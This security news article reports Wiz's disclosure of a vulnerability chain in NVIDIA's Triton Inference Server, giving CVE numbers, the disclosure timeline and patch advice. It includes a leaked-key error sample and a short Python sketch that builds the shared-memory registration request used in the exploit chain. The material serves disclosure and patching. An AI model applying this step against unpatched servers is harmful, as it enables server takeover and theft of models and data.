Researchers have discovered a chain of critical vulnerabilities in NVIDIA's Triton Inference Server, just two weeks after a separate Container Toolkit vulnerability was identified.

The Triton Inference Server is an open-source platform for running AI models at scale.

The flaws discovered by Wiz can potentially allow a remote, unauthenticated attacker to gain complete control of the server, achieving remote code execution (RCE).

NVIDIA has assigned the following identifiers to this vulnerability chain: CVE-2025-23319, CVE-2025-23320 and CVE-2025-23334.

The researchers noted that a successful attack could lead to:

  • Model Theft: Stealing proprietary and expensive AI models
  • Data Breach: Intercepting sensitive data being processed by the models, such as user information or financial data
  • Response Manipulation: Manipulating the AI model's output to produce incorrect, biased or malicious responses
  • Pivoting: Using the compromised server as a beachhead to attack other systems within the organization's network

Wiz researchers disclosed the vulnerability chain to NVIDIA on May 15, and the company acknowledged it on May 16.

A patch for the vulnerabilities was released via an NVIDIA security bulletin on August 4. Triton Inference Server users are strongly recommended to update to the latest version.

Wiz Details Attack Chain

In an August 4 blog post, the Wiz Research team provided an overview of the vulnerabilities it discovered.

While the Triton architecture is designed as a universal inference server that can deploy models from any major AI framework (PyTorch, TensorFlow, etc.), the Wiz research focused on the Python backend because of its widespread usage.

During its audit of the Python backend, Wiz identified a flaw in the error handling mechanism that discloses the unique name of the backend's internal IPC shared memory region.

The returned error message appears as follows: {"error":"Failed to increase the shared memory pool size for key 'triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859'…"}

The disclosure of this name is the first critical step in the exploit chain, as it exposes an internal component that should remain private.

With the leaked name of the Python backend's internal IPC shared memory, an attacker can turn the public-facing API used in Triton against itself. 

An attacker can therefore call the registration endpoint with the leaked internal key. Once the server accepts it, they can craft subsequent inference requests that use this region for input or output.
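Conceptually, that registration step looks like an ordinary call to Triton's shared-memory API. The sketch below only constructs the request rather than sending it; the endpoint path follows Triton's KServe system shared-memory extension, while the server address, offset, and byte size are illustrative placeholders:

```python
# Sketch of the registration request an attacker could issue with the leaked key.
# BASE_URL, the offset, and the byte size are hypothetical values for illustration.
BASE_URL = "http://triton.example:8000"  # placeholder Triton HTTP endpoint

def build_register_request(leaked_key: str, byte_size: int = 65536):
    """Build the URL and JSON body to register an existing shared-memory region
    under Triton's system shared-memory extension."""
    url = f"{BASE_URL}/v2/systemsharedmemory/region/{leaked_key}/register"
    body = {"key": leaked_key, "offset": 0, "byte_size": byte_size}
    return url, body
```

Once the server accepts such a registration, later inference requests can name the region as the backing store for their inputs or outputs, which is what yields the read/write primitives described next.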

This provides the attacker with powerful read and write primitives into the Python backend's private memory, which also contains internal data and control structures related to its IPC mechanism, all performed through standard, legitimate API calls.

Since an attacker can now alter the Python backend's shared memory, they can cause unexpected behavior in the server. This capability can be leveraged to gain full control of the server. 

This is the latest in a series of NVIDIA vulnerabilities disclosed by Wiz Research, including two container escapes: CVE-2025-23266 and CVE-2024-0132.

Image credit: Hepha1st0s / Shutterstock.com